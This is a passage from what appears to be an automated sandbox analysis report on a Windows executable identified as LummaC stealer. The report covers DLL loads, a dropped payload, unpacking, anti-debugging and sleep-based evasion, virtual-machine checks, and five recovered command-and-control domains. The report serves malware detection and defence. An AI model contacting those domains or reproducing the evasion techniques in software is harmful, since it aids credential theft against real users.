                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeUnpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeUnpacked PE file: 0.2.hpEAJnNwCB.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeUnpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0B11A push es; iretd 0_2_00B0B12B
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0F4D2 pushad ; ret 0_2_00B0F4EE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0F650 push ecx; ret 0_2_00B0F66D
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0CA24 pushad ; ret 0_2_00B0CA4C
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B0CEC5 push 00000003h; ret 0_2_00B0CEC9
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A09CD push ecx; ret 0_2_024A09E0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C799F push esp; retf 0_2_024C79A7
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024ACE18 push ss; retf 0_2_024ACE1D
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0249FFF3 push ecx; ret 0_2_024A0006
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C7F9D push esp; retf 0_2_024C7F9E
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C9DE8 pushad ; retf 0_2_024C9DEF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h3_2_0043BF01
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00901221 push ebx; retf 5C2Ch3_2_0090124B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_008FBBAD pushad ; ret 3_2_008FBBB2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_008FBE33 push ebp; ret 3_2_008FBE38
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CC167 push eax; mov dword ptr [esp], 49484716h3_2_024CC168
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CF555 push esp; iretd 3_2_024CF556
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AAF5D push esp; iretd 3_2_024AAF66
                  Source: hpEAJnNwCB.exeStatic PE information: section name: .text entropy: 7.543282648713042
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.376376674331909
                  Source: 91B1.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.376376674331909
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeWindow / User API: threadDelayed 390Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeWindow / User API: threadDelayed 9598Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65068
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948Thread sleep count: 390 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948Thread sleep time: -281580s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948Thread sleep count: 9598 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe TID: 7948Thread sleep time: -6929756s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe TID: 8036Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C8C59 FindFirstFileExW,0_2_024C8C59
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00B09BAB push dword ptr fs:[00000030h]0_2_00B09BAB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C00C6 mov eax, dword ptr fs:[00000030h]0_2_024C00C6
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0249092B mov eax, dword ptr fs:[00000030h]0_2_0249092B
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h]0_2_02490D90
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_008F8A3B push dword ptr fs:[00000030h]3_2_008F8A3B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249092B mov eax, dword ptr fs:[00000030h]3_2_0249092B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02490D90 mov eax, dword ptr fs:[00000030h]3_2_02490D90
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024BA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024BA63A
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024A073A
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0249FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0249FB78
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A08CD SetUnhandledExceptionFilter,0_2_024A08CD

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  LummaC encrypted strings found
                  Source: 91B1.tmp.exeString found in binary or memory: debonairnukk.xyz
                  Source: 91B1.tmp.exeString found in binary or memory: diffuculttan.xyz
                  Source: 91B1.tmp.exeString found in binary or memory: effecterectz.xyz
                  Source: 91B1.tmp.exeString found in binary or memory: deafeninggeh.biz
                  Source: 91B1.tmp.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeProcess created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_004351C0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_0043B282
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_0043B368
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_0043B645
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_0043B875
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024CB271
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_024C5034
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_024C5427
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_024CB4E9
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_024CB534
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: EnumSystemLocalesW,0_2_024CB5CF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_024CBADC
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024CBBA9
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_024CB8AC
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,0_2_024CB8A3
